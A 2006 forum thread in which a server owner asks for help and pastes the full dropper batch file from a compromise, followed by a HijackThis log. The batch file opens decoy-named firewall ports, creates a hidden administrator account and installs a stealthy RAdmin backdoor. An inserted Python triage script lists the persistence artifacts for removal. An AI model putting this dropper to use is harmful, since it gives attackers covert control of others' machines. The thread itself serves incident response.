# Trojan/Virus - Can't Remove



## Gunny123 (Mar 29, 2006)

Hey,

My server was hacked a couple of days ago. I've cleaned it up pretty well for the most part. I've deleted certain files and registry settings, added firewall protection, upgraded to the latest service packs and hotfixes, upgraded Serv-U, installed the avast virus scanner, and other tools from sysinternals.com.

However, a program called Security Task Manager is detecting 3 files with a risk rating of 92. At first I blew it off, but I've started looking into it more and more and it is a virus/trojan. I've performed several steps to try to clean it up; however, it's hidden from sysinternals.com Process Explorer and Task Manager, and the registry settings to auto-start it are hidden also, so I can't disable that. My virus scanner can't detect it either, and resident protection is running.

In security task manager, it shows the file is not found, so it can't delete or quarantine or kill the process.

I rebooted to see if I removed it successfully, but I didn't. It has this nasty batch file where it will extract the files needed, create an administrator user account, modify the Windows Firewall settings, set up RAdmin, and some other stuff. Like I said, I thought I had it, but I rebooted and saw the batch file there again, and my Windows Firewall settings modified.

I'm not too worried at this point because of my firewall restrictions, and I did a port scan and I'm not seeing the port for RAdmin open. I don't think I'm in harm's way, but I'd like to get rid of it regardless.

Any ideas?

Here is the batch file:

(Note, most files are not on the file system, unless they are hidden. I can't find the main zip file either. I could only find one file, and quarantined it.)

```bat
@echo off

netsh firewall set opmode mode=ENABLE exceptions=ENABLE profile=STANDARD
netsh firewall add portopening protocol = tcp port = 9450 name = WindowsUpdate
netsh firewall add portopening protocol = tcp port = 7205 name = SecurityCenter
netsh firewall add portopening protocol = tcp port = 3389 name = TerminalServices
netsh firewall add portopening protocol = tcp port = 7777 name = Certification
netsh firewall add portopening protocol = tcp port = 25931 name = MicrosoftProductUpdateService

if not exist %windir%\system32\ptrd.avm unrar.exe x -o+ -pq2b9H3Bl6I0 samclt.dll ptrd.avm %windir%\system32\
ptrd.avm user HelpAssistant /active:yes
ptrd.avm user HelpAssistant b0ble54!b2
ptrd.avm user HelpAssistant b0ble54!b2 /add
ptrd.avm localgroup Administrators HelpAssistant /add

if not exist %windir%\system32\wbem\AdmDll.dll unrar.exe x -o+ -pq2b9H3Bl6I0 samclt.dll wbem\AdmDll.dll %windir%\system32\
if not exist %windir%\system32\wbem\serv.exe unrar.exe x -o+ -pq2b9H3Bl6I0 samclt.dll wbem\serv.exe %windir%\system32\
if not exist %windir%\system32\wbem\cliccp.cpl unrar.exe x -o+ -pq2b9H3Bl6I0 samclt.dll wbem\cliccp.cpl %windir%\system32\

%windir%\system32\wbem\serv.exe install fuswci /n:"Fast User Switching" /b:%windir%\system32\wbem\mtsvc.exe /u:LocalSystem /s:AUTO /i:yes
%windir%\system32\wbem\cliccp.cpl -AddKey \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin
%windir%\system32\wbem\cliccp.cpl -AddKey \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0
%windir%\system32\wbem\cliccp.cpl -AddKey \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server
%windir%\system32\wbem\cliccp.cpl -AddKey \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\AskUser=00000000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableTrayIcon=01000000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\EnableEventLog=00000000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\EnableLogFile=00000000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\FilterIp=00000000
%windir%\system32\wbem\cliccp.cpl -Set REG_SZ "\HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\LogFilePath=%windir%\system32\msengs.dll"
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\NTAuthEnabled=00000000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port=251c0000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter=827E8E88A308053924CE0D66DF573F62
%windir%\system32\wbem\cliccp.cpl -Set REG_EXPAND_SZ "\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\fuswci\ImagePath=%windir%\system32\wbem\mtsvc.exe /service"
%windir%\system32\wbem\cliccp.cpl -Set REG_DWORD \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous=0x00000002
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY "\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\fuswci\FailureActions=00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,6e,00,64,00,01,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00"

if not exist %windir%\system32\wbem\bvsrv.dll unrar.exe x -o+ -pq2b9H3Bl6I0 samclt.dll wbem\bvsrv.dll %windir%\system32\
if not exist %windir%\system32\wbem\bvsrv.ocx unrar.exe x -o+ -pq2b9H3Bl6I0 samclt.dll wbem\bvsrv.ocx %windir%\system32\

if not exist %windir%\system32\rwinstall.exe goto EGG
:ret1
if not exist %windir%\system32\wbem\mtsvc.exe goto RAD
:ret2
if not exist %windir%\system32\wbem\fndpri.exe goto SER
:ret3
if not exist %windir%\system32\wbem\tmcfg.exe goto ROO
:ret4
goto END

:EGG
unrar.exe x -o+ -pq2b9H3Bl6I0 samclt.dll rwinstall.exe %windir%\system32\
unrar.exe x -o- -pq2b9H3Bl6I0 samclt.dll winsmp.dll %windir%\system32\
%windir%\system32\rwinstall.exe -run
goto ret1

:RAD
unrar.exe x -o+ -pq2b9H3Bl6I0 samclt.dll wbem\mtsvc.exe %windir%\system32\
unrar.exe x -o- -pq2b9H3Bl6I0 samclt.dll wbem\AdmDll.dll %windir%\system32\
unrar.exe x -o- -pq2b9H3Bl6I0 samclt.dll wbem\serv.exe %windir%\system32\
unrar.exe x -o- -pq2b9H3Bl6I0 samclt.dll wbem\cliccp.cpl %windir%\system32\
%windir%\system32\wbem\serv.exe install fuswci /n:"Fast User Switching" /b:%windir%\system32\wbem\mtsvc.exe /u:LocalSystem /s:AUTO /i:yes
%windir%\system32\wbem\cliccp.cpl -AddKey \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin
%windir%\system32\wbem\cliccp.cpl -AddKey \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0
%windir%\system32\wbem\cliccp.cpl -AddKey \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server
%windir%\system32\wbem\cliccp.cpl -AddKey \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\AskUser=00000000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableTrayIcon=01000000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\EnableEventLog=00000000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\EnableLogFile=00000000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\FilterIp=00000000
%windir%\system32\wbem\cliccp.cpl -Set REG_SZ "\HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\LogFilePath=%windir%\system32\msengs.dll"
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\NTAuthEnabled=00000000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port=251c0000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter=827E8E88A308053924CE0D66DF573F62
%windir%\system32\wbem\cliccp.cpl -Set REG_EXPAND_SZ "\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\fuswci\ImagePath=%windir%\system32\wbem\mtsvc.exe /service"
%windir%\system32\wbem\cliccp.cpl -Set REG_DWORD \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous=0x00000002
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY "\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\fuswci\FailureActions=00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,6e,00,64,00,01,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00"
ptrd.avm start fuswci
goto ret2

:SER
unrar.exe x -o+ -pq2b9H3Bl6I0 samclt.dll wbem\fndpri.exe %windir%\system32\
unrar.exe x -o- -pq2b9H3Bl6I0 samclt.dll wbem\wmsp.dll %windir%\system32\
unrar.exe x -o- -pq2b9H3Bl6I0 samclt.dll wbem\cliccp.cpl %windir%\system32\
%windir%\system32\wbem\fndpri.exe /i
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY "\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wdsmda\FailureActions=00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,6e,00,64,00,01,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00"
ptrd.avm start wdsmda
goto ret3

:ROO
unrar.exe x -o+ -pq2b9H3Bl6I0 samclt.dll wbem\tmcfg.exe %windir%\system32\
"%windir%\system32\wbem\tmcfg.exe"
goto ret4

:END
exit
```


----------
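As an added triage example (not code from the original post or from the poster's server), the Python script below parses a constructed excerpt of the dropper batch file above, with the RAR and account passwords replaced by a placeholder, and turns it into the list of persistence artifacts a defender should check: the firewall exceptions with their decoy names, the HelpAssistant account being enabled and placed in Administrators, the fuswci service, and the RAdmin registry settings, decoding the little-endian REG_BINARY Port value. It assumes ptrd.avm is the renamed net.exe the script extracts (an inference from its user/localgroup/start syntax, not something the post states).

```python
"""Triage of a dropper batch script: extract what it persists so it can be checked and removed."""
import re
import struct
from dataclasses import dataclass, field

# Constructed excerpt of the batch file quoted in the post (not the full script).
# Passwords are replaced with a placeholder. ptrd.avm is assumed to be the
# renamed net.exe the script extracts (inferred from its syntax).
SAMPLE_SCRIPT = r"""
@echo off
netsh firewall add portopening protocol = tcp port = 9450 name = WindowsUpdate
netsh firewall add portopening protocol = tcp port = 7205 name = SecurityCenter
netsh firewall add portopening protocol = tcp port = 3389 name = TerminalServices
ptrd.avm user HelpAssistant /active:yes
ptrd.avm user HelpAssistant PASSWORD_PLACEHOLDER /add
ptrd.avm localgroup Administrators HelpAssistant /add
%windir%\system32\wbem\serv.exe install fuswci /n:"Fast User Switching" /b:%windir%\system32\wbem\mtsvc.exe /u:LocalSystem /s:AUTO /i:yes
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\EnableEventLog=00000000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\NTAuthEnabled=00000000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port=251c0000
%windir%\system32\wbem\cliccp.cpl -Set REG_EXPAND_SZ "\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\fuswci\ImagePath=%windir%\system32\wbem\mtsvc.exe /service"
ptrd.avm start fuswci
"""

FIREWALL_RE = re.compile(r"netsh firewall add portopening.*?port\s*=\s*(\d+)\s+name\s*=\s*(\S+)", re.I)
SERVICE_RE = re.compile(r"serv\.exe install (\S+)\s+/n:\"([^\"]+)\".*?/b:(\S+)", re.I)
REG_SET_RE = re.compile(r'-Set\s+(REG_\w+)\s+"?\\(HKEY_.+?)"?\s*$', re.I)
USER_ENABLE_RE = re.compile(r"\buser\s+(\S+)\s+/active:yes\b", re.I)
USER_ADD_RE = re.compile(r"\buser\s+(\S+)\s+\S+\s+/add\b", re.I)
GROUP_ADD_RE = re.compile(r"\blocalgroup\s+(\S+)\s+(\S+)\s+/add\b", re.I)


@dataclass
class Triage:
    firewall: list = field(default_factory=list)         # (port, exception name)
    accounts_enabled: list = field(default_factory=list)
    accounts_added: list = field(default_factory=list)
    group_additions: dict = field(default_factory=dict)  # group -> [members]
    services: list = field(default_factory=list)         # (name, display name, binary)
    registry: list = field(default_factory=list)         # (type, key, value name, raw data, decoded)


def decode_reg_binary(hexdata):
    """A 4-byte REG_BINARY written as 8 hex chars is a little-endian DWORD (251c0000 -> 7205)."""
    if not re.fullmatch(r"[0-9a-fA-F]{8}", hexdata):
        return None
    return struct.unpack("<I", bytes.fromhex(hexdata))[0]


def triage(script):
    """Walk the script line by line and collect every persistence artifact it creates."""
    t = Triage()
    for raw in script.splitlines():
        line = raw.strip()
        if m := FIREWALL_RE.search(line):
            t.firewall.append((int(m.group(1)), m.group(2)))
        elif m := SERVICE_RE.search(line):
            t.services.append((m.group(1), m.group(2), m.group(3)))
        elif m := REG_SET_RE.search(line):
            path, _, data = m.group(2).partition("=")
            key, _, name = path.rpartition("\\")
            decoded = decode_reg_binary(data) if m.group(1).upper() == "REG_BINARY" else None
            t.registry.append((m.group(1), key, name, data, decoded))
        elif m := USER_ENABLE_RE.search(line):
            t.accounts_enabled.append(m.group(1))
        elif m := USER_ADD_RE.search(line):
            t.accounts_added.append(m.group(1))
        elif m := GROUP_ADD_RE.search(line):
            t.group_additions.setdefault(m.group(1), []).append(m.group(2))
    return t


def radmin_port(t):
    """The listener port the script configures for the RAdmin server, if any."""
    for _, key, name, _, decoded in t.registry:
        if "radmin" in key.lower() and name.lower() == "port":
            return decoded
    return None


def findings(t):
    """Human-readable checklist: what to look for on the host and what to undo."""
    out = []
    port = radmin_port(t)
    for fw_port, name in t.firewall:
        tag = " (this is the RAdmin listener port set in the registry)" if fw_port == port else ""
        out.append(f"Firewall exception '{name}' opens TCP {fw_port}{tag}")
    for acct in t.accounts_enabled:
        out.append(f"Built-in account '{acct}' enabled")
    for group, members in t.group_additions.items():
        for member in members:
            out.append(f"Account '{member}' added to local group '{group}'")
    for name, display, binary in t.services:
        out.append(f"Service '{name}' (shown as '{display}') installed, binary {binary}")
    for _, key, name, data, decoded in t.registry:
        if name.lower() in ("enableeventlog", "enablelogfile") and decoded == 0:
            out.append(f"RAdmin logging switched off ({name}={data})")
        if name.lower() == "ntauthenabled" and decoded == 0:
            out.append("RAdmin NT authentication disabled; server relies on its own password")
    return out


if __name__ == "__main__":
    for line in findings(triage(SAMPLE_SCRIPT)):
        print("-", line)
```

Decoding Port=251c0000 gives 7205, the same port the script opens in the firewall under the name SecurityCenter, so a scan for RAdmin's default port (4899) would not show the listener.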



## Gunny123 (Mar 29, 2006)

HijackThis:

StartupList report, 3/29/2006, 4:43:40 AM
StartupList version: 1.52.2
Started from : C:\Installed\HijackThis.EXE
Detected: Windows 2003 SP1 (WinNT 5.02.3790)
Detected: Internet Explorer v6.00 SP1 (6.00.3790.1830)
* Using default options
* Including empty and uninteresting sections
* Showing rarely important sections
==================================================

Running processes:

C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\msdtc.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\aswServ.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\PROGRA~1\MICROS~1\MSSQL\binn\sqlservr.exe
C:\Program Files\Simple DNS Plus\sdnsmain.exe
C:\Program Files\Serv-U\ServUDaemon.exe
C:\PROGRA~1\MICROS~1\MSSQL\binn\sqlagent.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Urchin\bin\urchind.exe
C:\Program Files\Urchin\bin\urchinwebd.exe
C:\Program Files\Urchin\bin\urchinwebd.exe
C:\Program Files\Common Files\System\MSSearch\Bin\mssearch.exe
C:\WINDOWS\System32\svchost.exe
c:\windows\system32\inetsrv\w3wp.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\rdpclip.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\ALWILS~1\Avast4\aswDisp.exe
C:\Program Files\Simple DNS Plus\sdnsgui.exe
c:\windows\system32\inetsrv\w3wp.exe
c:\windows\system32\inetsrv\w3wp.exe
c:\windows\system32\inetsrv\w3wp.exe
C:\WINDOWS\explorer.exe
C:\Installed\HijackThis.exe

--------------------------------------------------

Listing of startup folders:

Shell folders Startup:
[C:\Documents and Settings\user\Start Menu\Programs\Startup]
*No files*

Shell folders AltStartup:
*Folder not found*

User shell folders Startup:
*Folder not found*

User shell folders AltStartup:
*Folder not found*

Shell folders Common Startup:
[C:\Documents and Settings\All Users\Start Menu\Programs\Startup]
*No files*

Shell folders Common AltStartup:
*Folder not found*

User shell folders Common Startup:
*Folder not found*

User shell folders Alternate Common Startup:
*Folder not found*

--------------------------------------------------

Checking Windows NT UserInit:

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
UserInit = C:\WINDOWS\system32\userinit.exe,

[HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon]
*Registry key not found*

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
*Registry value not found*

[HKCU\Software\Microsoft\Windows\CurrentVersion\Winlogon]
*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run

Simple DNS Plus = C:\Program Files\Simple DNS Plus\sdnsplus.exe -s
avast! = C:\PROGRA~1\ALWILS~1\Avast4\aswDisp.exe

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Run

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Run

*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Run
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Run
*Registry key not found*

--------------------------------------------------

File association entry for .EXE:
HKEY_CLASSES_ROOT\exefile\shell\open\command

(Default) = "%1" %*

--------------------------------------------------

File association entry for .COM:
HKEY_CLASSES_ROOT\comfile\shell\open\command

(Default) = "%1" %*

--------------------------------------------------

File association entry for .BAT:
HKEY_CLASSES_ROOT\batfile\shell\open\command

(Default) = "%1" %*

--------------------------------------------------

File association entry for .PIF:
HKEY_CLASSES_ROOT\piffile\shell\open\command

(Default) = "%1" %*

--------------------------------------------------

File association entry for .SCR:
HKEY_CLASSES_ROOT\scrfile\shell\open\command

(Default) = "%1" /S

--------------------------------------------------

File association entry for .HTA:
HKEY_CLASSES_ROOT\htafile\shell\open\command

(Default) = C:\WINDOWS\system32\mshta.exe "%1" %*

--------------------------------------------------

File association entry for .TXT:
HKEY_CLASSES_ROOT\txtfile\shell\open\command

(Default) = %SystemRoot%\system32\NOTEPAD.EXE %1

--------------------------------------------------

Enumerating Active Setup stub paths:
HKLM\Software\Microsoft\Active Setup\Installed Components
(* = disabled by HKCU twin)

[>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}]
StubPath = C:\WINDOWS\inf\unregmp2.exe /ShowWMP

[>{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS] *
StubPath = RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP

[{2C7339CF-2B09-4501-B3F3-F3508C9228ED}] *
StubPath = %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll

[{36BBA8D2-CA5C-4847-81CC-4F807DD86C91}] *
StubPath = %SystemRoot%\system32\regsvr32.exe /s /n /i:IEUpdateUser urlmon.dll

[{44BBA840-CC51-11CF-AAFA-00AA00B6015C}] *
StubPath = "%ProgramFiles%\Outlook Express\setup50.exe" /APP:OE /CALLER:WINNT /user /install

[{44BBA842-CC51-11CF-AAFA-00AA00B6015B}] *
StubPath = rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msnetmtg.inf,NetMtg.Install.PerUser.NT

[{4b218e3e-bc98-4770-93d3-2731b9329278}] *
StubPath = %SystemRoot%\System32\rundll32.exe setupapi,InstallHinfSection MarketplaceLinkInstall 896 %systemroot%\inf\ie.inf

[{6BF52A52-394A-11d3-B153-00C04F79FAA6}] *
StubPath = rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\wmp.inf,PerUserStub

[{6D69F546-C1AF-4049-AE9E-28627B91D3F5}] *
StubPath = %SystemRoot%\system32\regsvr32.exe /s /n /i:IEUpdateAdmin urlmon.dll

[{7790769C-0471-11d2-AF11-00C04FA35D02}] *
StubPath = "%ProgramFiles%\Outlook Express\setup50.exe" /APP:WAB /CALLER:WINNT /user /install

[{89820200-ECBD-11cf-8B85-00AA005B4340}] *
StubPath = regsvr32.exe /s /n /i:U shell32.dll

[{89820200-ECBD-11cf-8B85-00AA005B4383}] *
StubPath = %SystemRoot%\system32\ie4uinit.exe

[{89B4C1CD-B018-4511-B0A1-5476DBF70820}] *
StubPath = C:\WINDOWS\system32\Rundll32.exe C:\WINDOWS\system32\mscories.dll,Install

[{A509B1A7-37EF-4b3f-8CFC-4F3A74704073}] *
StubPath = %SystemRoot%\system32\rundll32.exe iesetup.dll,IEHardenAdmin

[{A509B1A8-37EF-4b3f-8CFC-4F3A74704073}] *
StubPath = %SystemRoot%\system32\rundll32.exe iesetup.dll,IEHardenUser

--------------------------------------------------

Enumerating ICQ Agent Autostart apps:
HKCU\Software\Mirabilis\ICQ\Agent\Apps

*Registry key not found*

--------------------------------------------------

Load/Run keys from C:\WINDOWS\WIN.INI:

load=*INI section not found*
run=*INI section not found*

Load/Run keys from Registry:

HKLM\..\Windows NT\CurrentVersion\WinLogon: load=*Registry value not found*
HKLM\..\Windows NT\CurrentVersion\WinLogon: run=*Registry value not found*
HKLM\..\Windows\CurrentVersion\WinLogon: load=*Registry key not found*
HKLM\..\Windows\CurrentVersion\WinLogon: run=*Registry key not found*
HKCU\..\Windows NT\CurrentVersion\WinLogon: load=*Registry value not found*
HKCU\..\Windows NT\CurrentVersion\WinLogon: run=*Registry value not found*
HKCU\..\Windows\CurrentVersion\WinLogon: load=*Registry key not found*
HKCU\..\Windows\CurrentVersion\WinLogon: run=*Registry key not found*
HKCU\..\Windows NT\CurrentVersion\Windows: load=
HKCU\..\Windows NT\CurrentVersion\Windows: run=*Registry value not found*
HKLM\..\Windows NT\CurrentVersion\Windows: load=*Registry value not found*
HKLM\..\Windows NT\CurrentVersion\Windows: run=*Registry value not found*
HKLM\..\Windows NT\CurrentVersion\Windows: AppInit_DLLs=

--------------------------------------------------

Shell & screensaver key from C:\WINDOWS\SYSTEM.INI:

Shell=*INI section not found*
SCRNSAVE.EXE=*INI section not found*
drivers=*INI section not found*

Shell & screensaver key from Registry:

Shell=Explorer.exe
SCRNSAVE.EXE=C:\WINDOWS\System32\logon.scr
drivers=*Registry value not found*

Policies Shell key:

HKCU\..\Policies: Shell=*Registry key not found*
HKLM\..\Policies: Shell=*Registry value not found*

--------------------------------------------------

Checking for EXPLORER.EXE instances:

C:\WINDOWS\Explorer.exe: PRESENT!

C:\Explorer.exe: not present
C:\WINDOWS\Explorer\Explorer.exe: not present
C:\WINDOWS\System\Explorer.exe: not present
C:\WINDOWS\System32\Explorer.exe: not present
C:\WINDOWS\Command\Explorer.exe: not present
C:\WINDOWS\Fonts\Explorer.exe: not present

--------------------------------------------------

Checking for superhidden extensions:

.lnk: HIDDEN! (arrow overlay: yes)
.pif: HIDDEN! (arrow overlay: yes)
.exe: not hidden
.com: not hidden
.bat: not hidden
.hta: not hidden
.scr: not hidden
.shs: HIDDEN!
.shb: HIDDEN!
.vbs: not hidden
.vbe: not hidden
.wsh: not hidden
.scf: HIDDEN! (arrow overlay: NO!)
.url: HIDDEN! (arrow overlay: yes)
.js: not hidden
.jse: not hidden

--------------------------------------------------

Verifying REGEDIT.EXE integrity:

- Regedit.exe found in C:\WINDOWS
- .reg open command is normal (regedit.exe %1)
- Company name OK: 'Microsoft Corporation'
- Original filename OK: 'REGEDIT.EXE'
- File description: 'Registry Editor'

Registry check passed

--------------------------------------------------

Enumerating Browser Helper Objects:

*No BHO's found*

--------------------------------------------------

Enumerating Task Scheduler jobs:

*No jobs found*

--------------------------------------------------

Enumerating Download Program Files:

[Housecall ActiveX 6.5]
InProcServer32 = C:\WINDOWS\Downloaded Program Files\Housecall_ActiveX.dll
CODEBASE = http://housecall65.trendmicro.com/housecall/applet/html/native/x86/win32/activex/hcImpl.cab

[Shockwave Flash Object]
InProcServer32 = C:\WINDOWS\system32\Macromed\Flash\Flash8a.ocx
CODEBASE = http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

--------------------------------------------------

Enumerating Winsock LSP files:

NameSpace #1: C:\WINDOWS\System32\mswsock.dll
NameSpace #2: C:\WINDOWS\System32\winrnr.dll
NameSpace #3: C:\WINDOWS\System32\mswsock.dll
Protocol #1: C:\WINDOWS\system32\mswsock.dll
Protocol #2: C:\WINDOWS\system32\mswsock.dll
Protocol #3: C:\WINDOWS\system32\mswsock.dll
Protocol #4: C:\WINDOWS\system32\mswsock.dll
Protocol #5: C:\WINDOWS\system32\mswsock.dll
Protocol #6: C:\WINDOWS\system32\mswsock.dll
Protocol #7: C:\WINDOWS\system32\mswsock.dll
Protocol #8: C:\WINDOWS\system32\mswsock.dll
Protocol #9: C:\WINDOWS\system32\mswsock.dll
Protocol #10: C:\WINDOWS\system32\mswsock.dll
Protocol #11: C:\WINDOWS\system32\mswsock.dll
Protocol #12: C:\WINDOWS\system32\mswsock.dll
Protocol #13: C:\WINDOWS\system32\mswsock.dll

